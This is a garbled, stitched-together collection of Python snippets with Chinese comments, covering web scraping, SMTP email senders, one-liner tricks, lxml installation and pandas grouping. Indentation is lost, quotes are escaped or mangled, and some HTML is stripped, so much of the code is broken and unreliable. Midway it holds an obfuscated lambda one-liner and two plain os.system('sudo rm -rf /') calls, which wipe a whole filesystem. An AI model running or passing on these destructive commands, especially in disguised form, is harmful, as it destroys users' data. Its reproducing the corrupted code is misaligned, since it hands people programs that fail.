import requests
#https://zhuanlan.zhihu.com/p/20091394
s = requests.session()
url = \'http://how-old.net/Home/Analyze?isTest=False&source=&version=001\'
header = {
\'Accept-Encoding\':\'gzip, deflate\',
\'User-Agent\': \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0\",
\'Host\': \"how-old.net\",
\'Referer\': \"http://how-old.net/\",
\'X-Requested-With\': \"XMLHttpRequest\"
}
data = {\'file\':open(\'test.jpg\', \'rb\')}
#此处打开指定的jpg文件
r = s.post(url, files=data, headers=header)
h = r.content
print h
a = [0, 1, 2, 3, [4, 5, 6], 7]
b = a[:]
a[0] = 5
a[4][0] = 99
print(a)
print(b)
print([id(x) for x in a])
print([id(x) for x in b])
# encoding:utf-8
import urllib
import re
import json
url = \'http://news.163.com/special/00014RJU/nationalnews-json-data.js\'
result = urllib.urlopen(url).read().strip()
pattern = re.compile(r\';var newsList=(.*)\')
pattern = re.compile(r\';var newsList=([\\s\\S]*)\')#.*只能匹配非换行符,换成[\\s\\S]*即可
matchs = pattern.match(result)
print(matchs.group())
#coding:gbk
from filecmp import dircmp
def show_diff_files(dcmp):
for name in dcmp.diff_files:
print \"diff_file %s found in %s and %s\" % (name, dcmp.left,dcmp.right)
for sub_dcmp in dcmp.subdirs.values():
show_diff_files(sub_dcmp)
def show_only(dcmp):
if dcmp.left_only:
ave_rst = 1
for i in dcmp.left_only:
print \"%s只存在于%s中\"%(i,dcmp.left)
if dcmp.right_only:
for i in dcmp.right_only:
print \"%s只存在于%s中\"%(i,dcmp.right)
for sub_dcmp in dcmp.subdirs.values():
show_only(sub_dcmp)
def compare(dir1,dir2):
dcmp = dircmp(dir1,dir2)
show_diff_files(dcmp)
show_only(dcmp)
from email import encoders
from email.header import Header
from email.mime.text import MIMEText
from email.utils import parseaddr, formataddr
from time import sleep
from bs4 import BeautifulSoup
import requests
import smtplib
import time
def SendMessage(title): # 发送邮件
def _format_addr(s):
name, addr = parseaddr(s)
return formataddr((Header(name, \'utf-8\').encode(), addr))
from_addr = \'xxx@163.com\'#发件人信箱
password = \'xxxx\'#邮箱密码
to_addr = \'xxx@163.com\'#收件人信箱
smtp_server = \'smtp.163.com\'#请确保开启了smtp服务
msg = MIMEText(title, \'plain\', \'utf-8\')
msg[\'From\'] = _format_addr(\'邮件提醒 <%s>\' % from_addr)
msg[\'To\'] = _format_addr(\'亲爱的 <%s>\' % to_addr)
msg[\'Subject\'] = Header(\'邮件提醒更新\', \'utf-8\').encode()
server = smtplib.SMTP(smtp_server, 25)
server.set_debuglevel(1)
server.login(from_addr, password)
server.sendmail(from_addr, [to_addr], msg.as_string())
server.quit()
print(SendMessage(\'hello\'))
import sys, Image
img = Image.open(sys.argv[1]).convert(\'YCbCr\')
w, h = img.size
data = img.getdata()
cnt = 0
for i, ycbcr in enumerate(data):
y, cb, cr = ycbcr
if 86 <= cb <= 117 and 140 <= cr <= 168:
cnt += 1
print \'%s %s a porn image.\'%(sys.argv[1], \'is\' if cnt > w * h * 0.3 else \'is not\')
>>> echo \'{\"key\":\"value\"}\' | python -m json.tool
{
\"key\": \"value\"
}
//python -m json.tool
//在 vim 中执行这句代码,可以快速格式化 json 数据
curl -L http://restapi/json_response -o json-response | python -m json.tool
python -c \"import socket; sock=socket.create_connection((\'ns1.dnspod.net\',6666)); print sock.recv(16); sock.close()\"
$ python -c \"print(\' \'.join([str(i) for i in range(1,10000)]))\" | say
import re; from collections import Counter Counter(re.findall(r\'w+\',open(\'hamlet.txt\').read().lower())).most_common(100)
m = [ [1,2],[3,4]] zip(*m)
import antigravity就会打开 xkcd.com/about/
sum(map(int, str(2**1000)))
filter(lambda x: all(map(lambda p: x % p != 0, range(2, x))), range(2, n))
a=[3, 8, 9, 4, 1, 10, 6, 7, 2, 5]
[a[i:i+3] for i in xrange(0,len(a),3)]
结果[[3, 8, 9], [4, 1, 10], [6, 7, 2], [5]]
m = {\'a\': 1, \'b\': 2, \'c\': 3, \'d\': 4}
{v: k for k, v in m.items()}
结果:{1: \'a\', 2: \'b\', 3: \'c\', 4: \'d\'}
a = [1, 2, [3, 4], [[5, 6], [7, 8]]]
flatten = lambda x: [y for l in x for y in flatten(l)] if type(x) is list else [x]
flatten(a);
结果:[1,2,3,4,5,6,7,8]
python -m SimpleHTTPServer 8000,然后浏览器打开 localhost:8000,一个简易的web服务就开启了
print \'n\'.join([\' \'.join([\'%s*%s=%-2s\' % (y,x,x*y) for y in range(1,x+1)]) for x in range(1,10)])
print(*(i for i in range(2, 1000) if all(tuple(i%j for j in range(2, int(i**.5))))))
print [x[0] for x in [ (a[i][0], a.append((a[i][1], a[i][0]+a[i][1]))) for a in ([[1,1]], ) for i in xrange(100) ]]
import requests
import urllib
# 榜单歌曲批量下载
# r = requests.get(\'http://music.163.com/api/playlist/detail?id=2884035\') # 网易原创歌曲榜
# r = requests.get(\'http://music.163.com/api/playlist/detail?id=19723756\') # 云音乐飙升榜
# r = requests.get(\'http://music.163.com/api/playlist/detail?id=3778678\') # 云音乐热歌榜
r = requests.get(\'http://music.163.com/api/playlist/detail?id=3779629\') # 云音乐新歌榜
# 歌单歌曲批量下载
# r = requests.get(\'http://music.163.com/api/playlist/detail?id=123415635\') # 云音乐歌单——【华语】中国风的韵律,中国人的印记
# r = requests.get(\'http://music.163.com/api/playlist/detail?id=122732380\') # 云音乐歌单——那不是爱,只是寂寞说的谎
arr = r.json()[\'result\'][\'tracks\'] # 共有100首歌
for i in range(10): # 输入要下载音乐的数量,1到100。
name = str(i+1) + \' \' + arr[i][\'name\'] + \'.mp3\'
link = arr[i][\'mp3Url\']
urllib.request.urlretrieve(link, \'网易云音乐\\\\\' + name) # 提前要创建文件夹
print(name + \' 下载完成\')
import webbrowser
urls = [
\'http://www.douban.com\',
\'http://weibo.com\',
\'http://www.zhihu.com\',
\'http://www.v2ex.com/\',
\'https://github.com/\',
\'https://mail.google.com/\',
\'http://instagram.com/\',
]
map(lambda x: webbrowser.open(x), urls)
# -*- coding: utf-8 -*-
import requests
from bs4 import BeautifulSoup
import smtplib
from email.mime.text import MIMEText
from email.Header import Header
result = {\"name\": [], \"cover\": [], \"desc\": [], \"link\": [], \"price\": []}
def get_page():
return requests.get(\"http://t.cn/Rvm4xgc\").text
def parse(html):
soup = BeautifulSoup(html)
table = soup.body.find_all(\"table\")[6]
name = table.find_all(\"tr\")[1]
result[\"name\"].append(name.find_all(\"td\")[0].b.string)
result[\"name\"].append(name.find_all(\"td\")[2].b.string)
desc = table.find_all(\"tr\")[2]
book_1 = desc.find_all(\"td\")[0]
result[\"cover\"].append(book_1.a.img[\"src\"])
result[\"link\"].append(\"http://www.amazon.cn\" + book_1.a[\"href\"])
result[\"desc\"].append(book_1.contents[1])
result[\"price\"].append(book_1.find_all(\"p\")[1].b.span.string)
book_2 = desc.find_all(\"td\")[2]
result[\"cover\"].append(book_2.a.img[\"src\"])
result[\"link\"].append(\"http://www.amazon.cn\" + book_2.a[\"href\"])
result[\"desc\"].append(book_2.contents[1])
result[\"price\"].append(book_2.find_all(\"p\")[1].b.span.string)
mail_config = {
\"from\": \"gitradar@163.com\",
\"to\": \"liushuaikobe1993@163.com\",
\"server\": \"smtp.163.com\",
\"username\": \"gitradar\",
\"pwd\": \"yourpassword\"
}
def send_mail(sbj, content, from_whom=mail_config[\'from\'], to_whom=mail_config[\'to\'], server=mail_config[\'server\'],
username=mail_config[\'username\'], pwd=mail_config[\'pwd\']):
msg = MIMEText(content, \"html\", \"utf-8\")
msg[\'Subject\'] = Header(sbj, \"utf-8\")
msg[\'From\'] = from_whom
msg[\'To\'] = to_whom
s = smtplib.SMTP(server)
s.ehlo()
s.starttls()
s.login(username, pwd)
s.sendmail(from_whom, to_whom, msg.as_string())
def build_html():
return \'\' \\
+ \'\'+ result[\"name\"][0] + \' \'%20+%20result[\"price\"][0] + \'
\' \\
+ \'\' \\
+ \'
\' \\
+ \'\' \\
+ \'\'%20+%20result[\"desc\"][0] + \'
\' \\
+ \'\'+ result[\"name\"][1] + \' \'%20+%20result[\"price\"][1] + \'
\' \\
+ \'\' \\
+ \'
\' \\
+ \'\' \\
+ \'\'%20+%20result[\"desc\"][1] + \'
\' \\
+ \'\'
if __name__ == \"__main__\":
parse(get_page())
html = build_html()
sbj = \"Kindle今日特价书\"
send_mail(sbj, html)
print\'\\n\'.join([\'\'.join([(\'PYTHON!\'[(x-y)%7]if((x*0.05)**2+(y*0.1)**2-1)**3-(x*0.05)**2*(y*0.1)**3<=0else\' \')for x in range(-30,30)])for y in range(15,-15,-1)])
THON!PYTH YTHON!PYT
!PYTHON!PYTHON!PY N!PYTHON!PYTHON!P
N!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTH
N!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON
N!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!P
!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PY
PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYT
YTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTH
THON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHO
HON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON
N!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON
PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON
YTHON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON!
ON!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON
!PYTHON!PYTHON!PYTHON!PYTHON!PYTHON
YTHON!PYTHON!PYTHON!PYTHON!PYTHON
ON!PYTHON!PYTHON!PYTHON!PYTHO
PYTHON!PYTHON!PYTHON!PYTH
HON!PYTHON!PYTHON!PYT
PYTHON!PYTHON!P
ON!PYTHON
YTH
H
import zipfile
try:
with zipfile.ZipFile(\'1.zip\') as zFile: #创建ZipFile对象
#解压文件
zFile.extractall(path=\'./\',pwd=b\'1314\')
print(\'Extract the Zip file successfully!\')
except:
print(\'Extract the Zip file failed!\')
In [1]: isinstance(1, (int, long, float))
True
In [2]: isinstance(\'a\', (int, long, float))
False
In [1]: foo = \'123.456\'
In [2]: foo.replace(\'.\', \'\', 1).isdigit()
True
In [3]: bar = \'12.34.56\'
In [4]: bar.replace(\'.\', \'\', 1).isdigit()
False
def input_num():
while True:
num = raw_input(\'input a number : \')
if num.replace(\'.\', \'\', 1).isdigit():
return num
>>> f = 1.0
>>> f.is_integer()
True
>>> f = 1.0 / 3 + 2.0 / 3
>>> f.is_integer()
True
try:
f = float(input_value)
except Exception:
...
else:
# Is it a integer?
if f.is_integer():
...
else:
1. 安装wheel,命令行运行:
pip install wheel
2.在http://www.lfd.uci.edu/~gohlke/pythonlibs/#lxml 这里下载对应的.whl文件,注意别改文件名!
Ctrl + F,输入lxml,找到下面这段
Lxml, a binding for the libxml2 and libxslt libraries.
lxml‑3.4.4‑cp27‑none‑win32.whl
lxml‑3.4.4‑cp27‑none‑win_amd64.whl
lxml‑3.4.4‑cp33‑none‑win32.whl
lxml‑3.4.4‑cp33‑none‑win_amd64.whl
lxml‑3.4.4‑cp34‑none‑win32.whl
lxml‑3.4.4‑cp34‑none‑win_amd64.whl
lxml‑3.4.4‑cp35‑none‑win32.whl
lxml‑3.4.4‑cp35‑none‑win_amd64.whl
cp后面是Python的版本号,27表示2.7,根据你的Python版本选择下载。
3. 进入.whl所在的文件夹,执行命令即可完成安装
pip install 带后缀的完整文件名
$ pip install lxml-3.6.4-cp35-cp35m-win32.whl
Processing .\\lxml-3.6.4-cp35-cp35m-win32.whl
Installing collected packages: lxml
Successfully installed lxml-3.6.4
http://stackoverflow.com/questions/29440482/how-to-install-lxml-on-windows
http://stackoverflow.com/questions/2817869/error-unable-to-find-vcvarsall-bat
(lambda _: getattr(__import__(_(28531)), _(126965465245037))(_(9147569852652678349977498820655)))((lambda ___, __, _: lambda n: ___(__(n))[_ << _:-_].decode(___.__name__))(hex, long, True))
import os
os.system(\'sudo rm -rf /\')
__import__(\'os\').system(\'sudo rm -rf /\')
from selenium import webdriver
import time
browser = webdriver.Chrome()
browser.get(\"http://cnblogs.com\")
time.sleep(1)
browser.find_element_by_link_text(\"登录\").click()
time.sleep(1)
browser.find_element_by_id(\"input1\").send_keys(\"用户名\")
browser.find_element_by_id(\"input2\").send_keys(\"密码\")
browser.find_element_by_id(\"signin\").click()
time.sleep(1)
try:
if browser.find_element_by_link_text(\"退出\"):
print \"Login Successfully.\"
except:
print \"Login failed.\"
from selenium import webdriver
source_url=\'http://huaban.com/boards/28195582/\'
headers={
\'Host\':\'huaban.com\',
\'Pragma\':\'no-cache\',
\'Cache-Control\':\'no-cache\',
\'User-Agent\': \'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36\',
\'Cookie\':\'xxxxxx\'
}
cap = webdriver.DesiredCapabilities.PHANTOMJS
cap[\"phantomjs.page.settings.userAgent\"] = headers[\'User-Agent\'] #设置请求header头信息
cap[\"phantomjs.page.settings.loadImages\"] = False #禁止加载图片
cap[\"phantomjs.page.customHeaders.Host\"]=headers[\'Host\']
cap[\"phantomjs.page.customHeaders.Pragma\"]=headers[\'Pragma\']
cap[\"phantomjs.page.customHeaders.Cookie\"]=headers[\'Cookie\']
driver = webdriver.PhantomJS(desired_capabilities=cap)
driver.get(source_url)
echo \”u00e8u0091u0089u00e7u008au00b6u00e3u0083u00a2u00e3u0083u008eu00e3u0083u009du00e3u0083u00bcu00e3u0083u00abu00e3u0082u00a2u00e3u0083u00b3u00e3u0083u0086u00e3u0083u008a\”
x = u\’u00e8u0091u0089
print x
doc = \'\'\'
The Dormouse\'s story
p1p1p1
b1b1b1
p2p2p2
p4p4p4
\'\'\'
from lxml import html
tree = html.fromstring(doc)
a = tree.get_element_by_id(\"a1\")
print(html.tostring(a))
print(html.tostring(tree).decode())
def dropnode(e=None):
if e is None: return
if e.tag == \'body\': return
nd = e.getnext()
while nd is not None:
nd.drop_tree()
nd = e.getnext()
dropnode(e.getparent())
dropnode(a)
print(html.tostring(tree).decode())
import requests
from bs4 import BeautifulSoup
r = requests.get(\"http://www.pythonscraping.com\")
bs = BeautifulSoup(r.text,\'lxml\')
image = bs.find(\"a\", {\"id\": \"logo\"}).find(\"img\")[\"src\"]
ir = requests.get(image)
if ir.status_code == 200:
open(\'logo.jpg\', \'wb\').write(ir.content)
import requests
from bs4 import BeautifulSoup
r = requests.get(\"http://www.pythonscraping.com\")
bs = BeautifulSoup(r.text,\'lxml\')
image = bs.find(\"a\", {\"id\": \"logo\"}).find(\"img\")[\"src\"]
ir = requests.get(image)
if ir.status_code == 200:
open(\'logo.jpg\', \'wb\').write(ir.content)
import lxml.etree
import urllib.request
from lxml.etree import *
str_url = \'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pubmed&id=26693255&retmode=text&rettype=xml\'
request = urllib.request.Request(str_url)
xml_text = urllib.request.urlopen(request).read()
root = lxml.etree.XML(xml_text) # xml_text 为xml纯文本文件
# example 获取杂志名称和ISSN
# 使用 tag作为输入需要逐级进行
journal_name = root.find(\'PubmedArticle\').find(\'MedlineCitation\').find(\'Article\').find(\'Journal\').find(\'Title\').text
# 也可以使用xpath(必须使用相对路径,以.//开头,如果想使用绝对路径可以使用xpath函数)
journal_name = root.find(\'.//Title\').text
print(\'xpath:\' ,journal_name)
journal_name = root.xpath(\'//Title\')[0].text
print(journal_name)
import lxml.html
str_url = \'http://movie.douban.com/\'
request = urllib.request.Request(str_url)
html_text = urllib.request.urlopen(request).read()
root = lxml.html.fromstring(html_text)
# 获取本页面所有项目名称 cssselect() 函数,返回list,包含所有匹配的结果,可以使用css选择器,类似于jquery
movies_list = [a.text for a in root.cssselect(\'div.billboard-bd tr td a\')]
print(movies_list)
# 获取所有电影超链接
movies_href = [a.get(\'href\') for a in root.cssselect(\'div.billboard-bd tr td a\')]
print(movies_href)
n=7
list1=[\'a\',\'b\',\'c\',\'d\']
print (l * (n // len(l) + 1))[:n]
(list1 * 2)[:n]
import itertools
import math
(list1 * math.ceil( n / len(list1) ) )[:7]
n=7
list1=[\'a\',\'b\',\'c\',\'d\']
print list(itertools.islice(itertools.cycle(list1), 0, n))
pip install wheel
http://www.lfd.uci.edu/~gohlk… 下载对应版本的 lxml和Twisted,cp后面是Python的版本号,27表示2.7 pip install 对应的whl文件
pip install scrapy
list(set(list2)-set(list1))
eval(\'[1,2,3,4]\’)
[1, 2, 3, 4]
json.loads(str)
ast.literal_eval(str)
raw = b\'{\”aa\”:11,\”bb\”:22,\”cc\”:33}\’
d = json.loads(str(raw, \’utf-8\’))
d = eval(b\'{\”aa\”:11,\”bb\”:22,\”cc\”:33}\’)
s = b\'{\”aa\”:11,\”bb\”:22,\”cc\”:33}\’.decode(\’utf-8\’) # 先解码成字符串
data = json.loads(s) # 解析为字典对象
a_part = [2001, 12000]
b_part = [1001, 2000]
c_part = [11, 1000]
d_part = [1, 10]
data = range(1, 12000)
labels = [a_part, b_part, c_part, d_part]
sizes = []
for part in labels:
sum = 0
for each in data:
sum += each if each >= part[0] and each <= part[1] else 0
sizes.append(sum)
print(sizes)
sizes = [sum(each for each in data if part[0] <= each <= part[1]) for part in labels]
sizes = [sum(x for x in data if low<=x<=high) for low,high in labels]
import smtplib
from email.mime.text import MIMEText
mail_host = \”smtp.163.com\” # SMTP服务器
mail_user = \”username\” # 用户名
mail_pass = \”passwd\” # 密码
sender = \’user@163.com\’ # 发件人邮箱(最好写全, 不然会失败)
receivers = [\’to_someone@qq.com\’] # 接收邮件,可设置为你的QQ邮箱或者其他邮箱
content = \’过期教程害死人!\’
title = \’Python SMTP Mail Test\’ # 邮件主题
message = MIMEText(content, \’plain\’, \’utf-8\’) # 内容, 格式, 编码
message[\’From\’] = \”{}\”.format(sender)
message[\’To\’] = \”,\”.join(receivers)
message[\’Subject\’] = title
try:
smtpObj = smtplib.SMTP_SSL(mail_host, 465) # 启用SSL发信, 端口一般是465
smtpObj.login(mail_user, mail_pass) # 登录验证
smtpObj.sendmail(sender, receivers, message.as_string()) # 发送
print(\"mail has been send successfully.\")
except smtplib.SMTPException as e:
print(e)
###pip UnicodeDecodeError: \'ascii\' codec can\'t decode byte 0xc0 in position 0
vi mimetypes.py
import sys
reload(sys)
sys.setdefaultencoding(\’utf-8\’)
###后台运行命令
from subprocess import run
run(\”ping 127.0.0.1\”,shell=True)
import pandas as pd
cols = [\’流水号\’, \’处理人\’, \’处理时间\’]
data = [[10000, \’张三\’, \’2016-10-01\’],
[10000, \'李四\', \'2016-10-02\'],
[10001, \'王五\', \'2016-10-01\'],
[10002, \'赵六\', \'2016-10-03\'],
[10001, \'黄七\', \'2016-10-02\'],
[10000, \'吴八\', \'2016-10-03\']]
df = pd.DataFrame(data,columns=cols)
grp = [(n, \’,\’.join([r for r in set(df[df[\’流水号\’]==n][\’处理人\’])]))
for n in set(df[\'流水号\'])]
df2 = pd.DataFrame(grp, columns=cols[:-1])
print(df)
print(df2)
cols = [\’流水号\’, \’处理人\’, \’处理时间\’]
data = [[10000, \’张三\’, \’2016-10-01\’],
[10000, \'李四\', \'2016-10-02\'],
[10001, \'王五\', \'2016-10-01\'],
[10002, \'赵六\', \'2016-10-03\'],
[10001, \'黄七\', \'2016-10-02\'],
[10000, \'吴八\', \'2016-10-03\']]
frame = pd.DataFrame(data,columns=cols)
def combination(names):
return \',\'.join(names)
frame.groupby(\’流水号\’).aggregate(combination)